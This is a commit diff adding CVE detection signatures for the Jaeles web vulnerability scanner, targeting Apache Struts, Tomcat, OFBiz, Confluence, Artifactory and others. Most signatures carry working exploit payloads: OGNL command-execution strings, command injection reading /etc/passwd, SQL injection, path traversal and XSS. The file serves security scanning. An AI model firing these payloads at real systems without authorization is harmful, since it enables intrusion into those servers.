jaeles-project · j3ssie · Nov 10, 2020 · Nov 9, 2020
diff --git a/cves/aircontrol-rce.yaml → common/aircontrol-rce.yaml b/cves/aircontrol-rce.yaml → common/aircontrol-rce.yaml
diff --git a/common/bigip-cve-2020-5902.yaml b/common/bigip-cve-2020-5902.yaml
diff --git a/common/fortigate-path-traversal.yaml b/common/fortigate-path-traversal.yaml
diff --git a/cves/joomla-lfi-comfabrik.yaml → common/joomla-lfi-comfabrik.yaml b/cves/joomla-lfi-comfabrik.yaml → common/joomla-lfi-comfabrik.yaml
diff --git a/cves/joomla-sqli-hdwplayer.yaml → common/joomla-sqli-hdwplayer.yaml b/cves/joomla-sqli-hdwplayer.yaml → common/joomla-sqli-hdwplayer.yaml
diff --git a/common/nuxeo-ssti-rce.yaml b/common/nuxeo-ssti-rce.yaml
diff --git a/cves/apache-ofbiz-xss-cve-2020-9496.yaml b/cves/apache-ofbiz-xss-cve-2020-9496.yaml
@@ -0,0 +1,24 @@
+id: CVE-2020-9496
+info:
+  name: Apache OFBiz XSS
+  risk: Medium
+
+params:
+  - root: '{{.BaseURL}}/'
+
+
+requests: 
+  - method: POST
+    url: >-
+      {{.root}}webtools/control/xmlrpc
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+      - Origin: http://{{.Host}}
+      - Content-Type: application/xml
+    data: <?xml version="1.0"?><methodCall><methodName>JAELES</methodName><params><param><value>cvebase</value></param></params></methodCall>
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeaders", "Content-Type: text/xml") && StringSearch("resBody", "No such service [JAELES]") && StringSearch("resBody", "faultString") && StringSearch("resBody", "methodResponse")
+
+references:
+  - https://www.cvebase.com/cve/2020/9496
diff --git a/cves/apache-struts-rce-cve-2013-2251.yaml b/cves/apache-struts-rce-cve-2013-2251.yaml
@@ -0,0 +1,31 @@
+id: CVE-2013-2251
+info:
+  name: Apache Struts 2 RCE
+  risk: Critical
+
+params:
+  - root: '{{.BaseURL}}/'
+
+variables:
+  - endpoint: |
+      index.action
+      login.action
+requests:
+  - method: GET
+    url: >-
+      {{.root}}{{.endpoint}}?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resBody", "uid=")
+  - method: GET
+    url: >-
+      {{.root}}{{.endpoint}}?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resBody", "uid=")
+references:
+  - https://www.cvebase.com/cve/2013/2251
diff --git a/cves/apache-struts-rce-cve-2017-5638.yaml b/cves/apache-struts-rce-cve-2017-5638.yaml
@@ -0,0 +1,24 @@
+id: CVE-2017-5638
+info:
+  name: Apache Struts 2 RCE
+  risk: Critical
+
+params:
+  - root: '{{.BaseURL}}/'
+
+variables:
+requests:
+  - method: GET
+    url: >-
+      {{.root}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+      - Content-Type: "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Jaeles','cvebase')}.multipart/form-data"
+      - Pragma: no-cache
+      - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
+
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeaders", "X-Jaeles: cvebase")
+references:
+  - https://www.cvebase.com/cve/2017/5638
diff --git a/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml b/cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml
@@ -0,0 +1,23 @@
+id: CVE-2018-11759
+info:
+  name: Apache Tomcat JK Status Manager Exposed
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}/'
+
+variables:
+  - endpoint: |
+      jkstatus
+      jkstatus;
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}{{.endpoint}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resBody", "JK Status Manager")
+references:
+  - https://www.cvebase.com/cve/2018/11759
diff --git a/cves/tomcat-open-redirect.yaml → ...-tomcat-open-redirect-cve-2018-11784.yaml b/cves/tomcat-open-redirect.yaml → ...-tomcat-open-redirect-cve-2018-11784.yaml
@@ -1,6 +1,6 @@
-id: cve-tomcat-04
+id: CVE-2018-11784
 info:
-  name: Tomcat Open Redirect - CVE-2018-11784
+  name: Apache Tomcat Open Redirect
   risk: High
 
 requests:
@@ -12,7 +12,7 @@ requests:
       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
     detections:
       - >-
-        StatusCode() == 302 && StringSearch('resHeader', 'google.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}')
+        StatusCode() == 302 && StringSearch('resHeader', 'google.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}.*')
 
 reference:
-  - link: https://github.com/breaktoprotect/CVE-2017-12615
+  - https://www.cvebase.com/cve/2018/11784
diff --git a/cves/tomcat-put-method.yaml → cves/apache-tomcat-put-cve-2017-12615.yaml b/cves/tomcat-put-method.yaml → cves/apache-tomcat-put-cve-2017-12615.yaml
@@ -1,7 +1,6 @@
-# info to search signature
-id: cve-tomcat-03
+id: CVE-2017-12615
 info:
-  name: Tomcat PUT method allowed - CVE-2017-12615
+  name: Tomcat PUT method allowed
   risk: High
 
 variables:
@@ -29,4 +28,4 @@ requests:
         StatusCode() == 200 && StringSearch('response', 'JSP uploaded')
 
 reference:
-  - link: https://github.com/breaktoprotect/CVE-2017-12615
+  - https://www.cvebase.com/cve/2017/12615
diff --git a/cves/apache-tomcat-rce-cve-2020-9484.yaml b/cves/apache-tomcat-rce-cve-2020-9484.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-9484
+info:
+  name: Apache Tomcat RCE
+  risk: Critical
+
+params:
+  - root: '{{.BaseURL}}/'
+
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+      - Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy
+    detections:
+      - >-
+        StatusCode() == 500 && RegexSearch("resBody", "Exception") && RegexSearch("resBody", "ObjectInputStream") && RegexSearch("resBody", "PersistentManagerBase")
+
+references:
+  - https://www.cvebase.com/cve/2020/9484
diff --git a/cves/artica-web-proxy-sqli-cve-2020-17506.yaml b/cves/artica-web-proxy-sqli-cve-2020-17506.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-17506
+info:
+  name: Artica Web Proxy SQLi
+  risk: Critical
+
+params:
+  - root: '{{.BaseURL}}/'
+
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        (StatusCode() == 200 || StatusCode() == 301 || StatusCode() == 302) && StringSearch("resHeaders", "PHPSESSID") && StringSearch("resBody", "artica-applianc")
+
+references:
+  - https://www.cvebase.com/cve/2020/17506
diff --git a/cves/artifactory-improper-authorization-cve-2019-9733.yaml b/cves/artifactory-improper-authorization-cve-2019-9733.yaml
@@ -0,0 +1,34 @@
+id: CVE-2019-9733
+info:
+  name: Artifactory Improper Authorization
+  risk: Critical
+
+params:
+  - root: '{{.BaseURL}}/'
+
+variables:
+  - endpoint: |
+      artifactory/ui/auth/login
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}{{.endpoint}}?_spring_security_remember_me=false
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+      - X-Requested-With: artUI
+      - serial: 58
+      - X-Forwarded-For: 127.0.0.1
+      - Request-Agent: artifactoryUI
+      - Content-Type: application/json
+      - Origin: http://{{Hostname}}
+      - Referer: http://{{Hostname}}/artifactory/webapp/
+      - Accept-Encoding: gzip, deflate
+      - Accept-Language: en-US,en;q=0.9
+      - Connection: close
+    body: {"user":"access-admin","password":"password","type":"login"}
+    detections:
+      - >-
+        StatusCode() == 200 && RegexSearch("resBody", '"username": "access-admin"')
+
+references:
+  - https://www.cvebase.com/cve/2019/9733
diff --git a/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml b/cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml
@@ -0,0 +1,24 @@
+id: CVE-2019-3396
+info:
+  name: Atlassian Confluence Path Traversal
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}/'
+
+variables:
+  - endpoint: |
+      rest/tinymce/1/macro/preview
+requests: 
+  - method: POST
+    url: >-
+      {{.root}}{{.endpoint}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    body: {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resBody", "<param-name>contextConfigLocation</param-name>")
+
+references:
+  - https://www.cvebase.com/cve/2019/3396
diff --git a/cves/atlassian-confluence-xss-cve-2018-5230.yaml b/cves/atlassian-confluence-xss-cve-2018-5230.yaml
@@ -0,0 +1,22 @@
+id: CVE-2018-5230
+info:
+  name: Atlassian Confluence XSS
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}/'
+
+variables:
+  - endpoint: |
+      pages/includes/
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}{{.endpoint}}status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resBody", 'SRC="javascript:alert(1337)">')
+references:
+  - https://www.cvebase.com/cve/2018/5230
diff --git a/cves/atlassian-rce-cve-2019-11580.yaml b/cves/atlassian-rce-cve-2019-11580.yaml
@@ -0,0 +1,22 @@
+id: CVE-2019-11580
+info:
+  name: Atlassian Crowd Data Center RCE
+  risk: Critical
+
+params:
+  - root: '{{.BaseURL}}/'
+
+variables:
+  - endpoint: |
+      crowd/plugins/servlet/exp
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}{{.endpoint}}?cmd=cat%20/etc/passwd
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") 
+references:
+  - https://www.cvebase.com/cve/2019/11580